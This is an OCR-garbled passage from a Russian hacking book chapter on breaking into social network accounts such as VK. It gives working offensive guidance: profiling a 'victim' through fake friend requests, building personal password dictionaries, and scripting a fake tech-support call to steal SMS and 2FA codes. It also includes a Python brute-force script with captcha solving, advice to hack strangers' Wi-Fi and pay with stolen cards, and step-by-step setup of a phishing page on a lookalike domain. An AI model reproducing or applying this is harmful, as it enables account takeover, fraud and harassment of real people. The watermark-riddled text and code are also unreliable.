Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

книги хакеры / Хакинг на примерах

.pdf
Скачиваний:
19
Добавлен:
19.04.2024
Размер:
30.29 Mб
Скачать
...........

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

1 1 11, , ;"' J) ' 1, 1 1 1 i 11 ! i 11 .: , i 1 ! , , 1 1 l 1 : •, 1 /', 1.. 1) 111(, l 11,111,: \ t' {' 1 1 \

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

Click

 

 

Такжеm

 

 

 

 

 

 

 

 

 

 

m

w

 

 

 

будет неплохо добавиться в друзья к некоторым друзьям жертвыClick, а

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

w

.

 

 

 

 

 

 

.c

w

 

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

затем добавиться в друзья к самой жертве. Этим ты не вызовешь подозрения

 

 

g

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

(жертва увидит, что ты являешься общим знакомым, возможно, она где-то тебя видели (ясное дело, не тебя, а ту фейковую фотку, которую ты поста­ вишь в фейковый аккаунт), и не захочет отказываться в добавлении в друзья, тем более, что есть общие знакомые). В результате ты получишь доступ к информации, которая открыта только для друзей - некоторые фото, по кото­ рым можно понять, где бывает жертва; номер телефона; email и т.д.

Номер телефона и e-mail тебе понадобятся для отправки фейковых сообще­ ний якобы от социальной сети. Если на социальной страничке их нет, тебе придется их вычислить. Собери как можно больше аккаунтов, которыми пользуется твоя жертва - Facebook, VK, Instagram, Twitter и т.д. Поочеред­ но, попробуй восстановить пароль в каждом из этих аккаунтов. При восста­ новлении пароля сообщение может быть отправлено или на e-mail или на телефон, если он привязан к аккаунту. Каждый из этих сервисов закрывает звездочками свою часть номера. Например, попытайся восстановить пароль на VK - ты получишь одну часть номера телефона. Затем, если почта у жерт­ вы на Mail.Ru, попытайся восстановить доступ к почте - ты получишь вто­ рую часть номера. Если не будет хватать нескольких символов, не проблема,южно перебрать, вариантов то всего IО для каждого знако-места. Конечно, если не хватает двух ццфр, то вариантов уже 100.

Почту можно вычислить в коде страницы. Например, если жертва пользует­ ся социальной сетью Мой мир, то ее электронная почта есть в коде страни­

.цы профиля или даже в URL. Можно использовать социальный инжинириг - познакомиться с жертвой, общаться несколько дней, чтобы не вызывать подозрения, затем попросить e-mail, чтобы отправить якобы интересующую

жертву информацию. Вуаля - почта есть. Правда, жертва может использо­ вать для социальной сети и личной переписки разные ящики - это усложнит задачу. Аналогичным образом, впрочем, можно добыть и номер телефона.

Также выясни все клички животных - которые были и которые есть. Очень часто кличка животного является частью пароля или самим паролем. То же самое можно сказать и о детях. Если у жертвы есть дети, выясни, как их зо­ вут. Очень часто паролем является имя ребенка. Причем если есть девочка и мальчик, то, скорее всего, паролем будет имя девочки (возможно, с какими­ то цифрами, например, годом или датой рождения, например, Vika201012).

Хобби или увлечения - еще одно слабое место. Например, если жертва - фа­ нат Audi, то паролем может быть слово Audi с какими-то цифрами, напри­ мер:

'--------.--.-----.---..--.......-.-.--...---..-........·-..-........--.--

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

\,11,11111

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

11.1 111)11\ll р,1\

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

// Блок Хобби

Audi798

AudiQ7 AudiQ7_798 Audi 798 Audi 197798 Audi 798197

AudiQ7_798197 Audi798197 Audi197798

audi798

audiq7 audiq7_798 audi 798 audi 197798 audi 798197

audiq7_798197 audi798197 audi197798

// Блок личные данные

 

Andrey77

andrey140377

 

----------------------------------------------------------------------------------

·

 

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

w Click

 

 

140377

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

df

 

 

 

 

o

 

 

.

 

 

n 14031977

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

-xcha

e

 

 

 

 

 

Andrey140377

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Andrey14031977

 

 

 

 

 

 

 

ivanov140377

 

 

 

 

 

 

 

ivanov140377

 

 

 

 

 

 

 

4952223344

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

P

 

 

 

 

 

 

NOW!

o

!

1,11,

1

S.

1

\ ,

111,1 11

; .111111 1 .'

,11, :.

1'

: 11111: 1:

l 111111.1 11, 111,1 \

 

 

 

 

 

 

 

 

l l' 111

\

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

// Дети и животные

Vika201012

 

vika201012

 

Vika20102012

 

vika20102012

 

Vika2012

 

vika2012

 

// Другие аккаунты

iandrey1403

 

iandrey140377

 

iandrey14031977

 

// Разный бред

вроде:

123456789qwerty

 

qwerty1234567890000

'-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - _,_ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ...

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

 

 

o

 

 

 

 

 

NOW!\,11,11111

 

 

 

 

 

BUY

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

11 1 lljlfl'I\ !),1\

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Внимание! Двухфакторная авторизация.

Фишкой последних дней стала двухфакторная авторизация. Ког­ да социальная сеть видит, что пользователь пытается войти с другого устройства, она отправляет код на его номер телефона в SMS. Здесь важно запастись номером жертвы. Если такое про­ изойдет, ты должен моментально отправить сообщение жертве «Для предотвращения нежелательного доступа к аккаунту от­ правьте код, полученный из предыдущего SMS)) или что-то в подобном духе. Жертва в запарке может взять да и отправить код, который социальная сеть прислала ей для входа в аккаунт! Конечно, жертва может догадаться и ничего не отправить - та­ кое тоже может произойти и тебе придется искать другие методы взлома. Также нужно отметить, что далеко не все пользователи включают двухфакторную авторизацию - многие даже не пони-

мают, что это такое!

8.3.Методы взлома

8.3.1.Взлом электронной почты

8.3.2.Социальный инжиниринr

----------------------------------------------------------------------------------·

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

действоватьm

наверняка и сказать, что осуществляется взлом вашей страничw Click

 

 

 

 

 

 

m

 

 

 

­

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

ки. Звоните, представляетесь специалистом техподдержки ВКонтакте Рома­

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

ном (ну или любьiм другим именем, которое вам больше нравится), уточня­ ете ФИО (оно есть в анкете, как, часто и номер телефона) и сообщаете, что вашу страничку пытаются взломать. Сами тем временем пытаетесь войти на страничку пользователя, точнее восстановить его пароль. Сообщаете жерт­ ве, что сейчас на его номер телефона придет SMS и нужно продиктовать код, чтобы техподдержка могла убедиться в том, что пользователь - это именно он, и чтобы отсечь все попытки хакеров взломать аккаунт. Жертва сообщает код, дальше дело техники. Главное, чтобы ты позвонил раньше, чем придет код. Поэтому сначала звоним, устанавливаем контакт, а затем - инициируем восстановления пароля. С некоторыми пользователями это легко сработает и на все про все ты потратишь 5-1 О минут. Это может существенно ускорить взлом по сравнению с другими методами, где придется неделями заниматься

«окучиванием» аккаунта жертвы.

8.3.3. Перебор пароля

Как уже бьmо отмечено ранее, различные утилиты для грубой силы (Ьruteforce) нет смысла использовать с социальными сетями, учитывая бло­ кировку аккаунта после определенного количества неправильных попыток ввода пароля. Лучше всего использовать точечные словари, составленные на основе личных данных.

Пароли можно вводить вручную - их не так много - или же автоматизировать этот процесс. Всевозможные скрипть1 для сего ты можешь найти в Интер­ нете. Приводим пример (лист. 8.1) скрипта, написанного на Python. Скрипт

автоматизирует перебор паролей через мобильную версию ВКонтакте.

Листинг 8.1. Перебор пароля через мобильную версию ВКонтакте

#! coding: utf8

 

 

import grab, re,

urllib2

 

from antigate import AntiGate

from grab import GrabTimeoutError

from time import

sleep

 

cap_key ':" '123 '

#Ваш ключ с Antigate

def anti(key, file):

#Получение решения Captcha с Antigate

try:

 

 

try:

= AntiGate(key, file)

data

. - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - -- - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ...

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

return data

except Keyboardinterrupt:

рrint("Завершение")

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

except:

anti(key, file)

 

def save(url, file):

tскачивание файла по URL

site • urllib2.urlopen(url)

 

f = open(file, 'wb')

 

f.write(site.read())

 

def cap_solve(img): save(img, 'captcha.jpg')

key = anti(cap_key, 'captcha.jpg') return key

def brute(login, passwords, save): out = open(save, 'w')

psswrds = open(passwords,'r')

try:

int(login) prefix True

except:

prefix False

g = grab.Grab() g.go('http://m.vk.com')

for line in psswrds:

psswrd = line.rstrip('\r\n') g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.submit()

if g.doc.text_search(u'captcha'):

all_captchas

re.findall('"(/captcha.php[ л "]*)"',

g.response.body) (О]

captcha = '' + all_captchas

 

key = cap_solve(captcha)

 

g.doc.set_input('email', login)

 

g.doc.set_input('pass', psswrd)

 

g.doc.set_input('captcha_key', str(key))

 

g.doc.submit()

print("cap")

 

if 'Подтвердить' in g.response.body:

 

818-········-····-···-···-···-··---·-··-···--·---··-·--·-···--··--···--··--·······--··

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

group(0)

group(0)

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

P

 

 

 

 

 

NOW!

o

f

1,11"1 S ((, 1(,11 11 ;,lllllli,' ,11,1,,1' 1111 1' 1\ LHllll,I 11,lil,I\ ll 111'

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

if

prefix:

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

prefixl

g.doc.rex_search('\+[0-9] *').

 

w

 

df-x chan

 

o

 

 

 

.

.c

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

e

 

 

prefix2

g. doc.rex_search(' [0-9] *').

 

 

 

 

 

 

 

 

 

 

 

 

prel

re.findall('[0-9]{ 1, } ',

prefixl)[О]

 

 

 

 

 

 

 

 

 

 

 

pre2

re.findall('[0-9](1,}',

prefix2)[0]

 

 

 

 

 

 

 

 

 

 

login = login. replace(prel, ") login = login.replace(pre2, '')

 

g.set input('code',

login)

 

 

g.submit()

 

 

 

 

 

 

 

print(login + ':' + psswrd +

 

'--success')

 

 

 

 

 

 

 

 

out.write(login +

'

. ,

+ psswrd +

'\n')

 

 

 

 

else:

 

 

 

. ,

 

 

 

out.write(login +

'

+ psswrd +

'\n')

 

 

 

else:

 

 

 

 

 

 

 

if g.doc.rex_search('[л >]+') .group(O)

==

'Login I VK':

 

 

 

 

 

 

 

 

print(login +

'

. ,

+ psswrd + '--fail')

 

 

 

 

else:

 

. ,

 

 

 

 

 

print(login +

'

+ psswrd +

 

 

 

 

 

'--success')

 

 

 

 

. ,

 

 

 

out.write(login +

'

+ psswrd +

'\n')

 

 

 

out. close() psswrds.close()

Да, этот скрипт далек от идеала, но при желании ты его можешь доработать. В нем хорошо то, что он будет сам вводить капчу с помощью Antigate, а капча будет появляться, поскольку ты входишь в систему из другой страны.

Примечание. Надеюсь, ты догадался использовать все меры предосторожности? Используй меры из главы 5 для обеспече­ ния анонимности. Как минимум, не взламывай аккаунты со свое­ го домашнего Интернета, купи SIМ-карту и смени свою локацию. Используй VPN или Тог. Если карточку купить не получается, взломай чей-то Wi-Fi - это неплохой шанс остаться незамечен­ ным. Но не забывай о предосторожности. Если не хочешь ис­ пользовать VPN (или социальная сеть блокирует доступ из...VPN/

Тог), взломай чей-то Wi-Fi (только не соседский, а желательно в

другом доме) и используй на своем компе для работы виртуаль-

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

'\,il,1111!

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

11,1 lljlll'll J• 1

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

ную машину, которую ты удалишь, как только цель будет достигClick­

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

.c

 

 

 

.

 

-x cha

 

 

нута. Чтобы на твоем компе не остались данные, которые могли

g

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

бы доказать, что взламывал именно ты. А то Autopsy - довольно мощный инструмент и может накопать о тебе больше инфы, чем ты сам о себе знаешь!

Данный метод позволяет вой1;и на страничку без смены пароля, то есть по­ дойдет в случае, если тебе нужно, чтобы жертва не догадывалась о взломе

страницы.

8.3.4. Фншинr или фейковая страничка. Очень подробное руководство

Фишинг - наверное, самый распространенный метод взлома страниц в соци­ альных сетях. Например, хакер может просто создать идентичную по струк­ туре и дизайну страницу, на которой сайт запрашивает логин и пароль жерт­

вы. Когда жертва его вводит, логин и пароль отправляются хакеру.

Примечание. Fishing происходит от fish - рыба. В свою очередь, этот метод подразумевает «ловлю на крючок)). Попадется жерт-

ва или нет - зависит от опытности рыбака и смекалки рыбы.

Хоть и сейчас многие пользователи уже достаточно грамотные и могут от­ личить адрес фишингового сайта от реального, не стоит забывать, что есть новички, которые увидев схожий дизайн, начинают слепо доверять сайту.

Как реализовать:

1.Зарегистрируй домен вроде vk-login.com, facebook-login.com, fЬ-login. com или как-то так, чтобы было похоже на адрес соцсети. Регистрацию нужно производить на фейковый e-mail, оплачивать биткоинами или украденной кредиткой.

2.Купи какой-то дешевый хостинг, не в России, прикрути домен к этому хо­ стингу. Купи самый дешевый SSL-сертификат, чтобы браузер не ругался на его отсутствие. Так у тебя ничего не получится еще в самом начале! Хостинг должен быть с поддержкой РНР - это обязательное условие.

3.Используя команду Сохранить как в браузере сохрани страничку входа в социальную сеть вместе с картинками.

4.Отредактируй НТМL-код так, чтобы введенные имя пользователя и па­ роль отправлялись тебе на электронную почту, сценарий будет приведен.

&1---------------------------------------------------------------------------------

·

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

.

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Сохранить как. Страница ( полностью),

,.•.

,.,.,,.,., ,., ... ,,...

 

--

....

Рис. 8.1. Страница входа в ВКонтакте

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Рис. 8.2. Сохранение страницы в ВКонтакте

Рис. 8.3. Страничка сохранена

1111----- --------- - - - - ---- --- - - - --- . - --.- - - . - - - - --- - -- --- .. - - - - - - - . - - - -- --- ----. ---- _,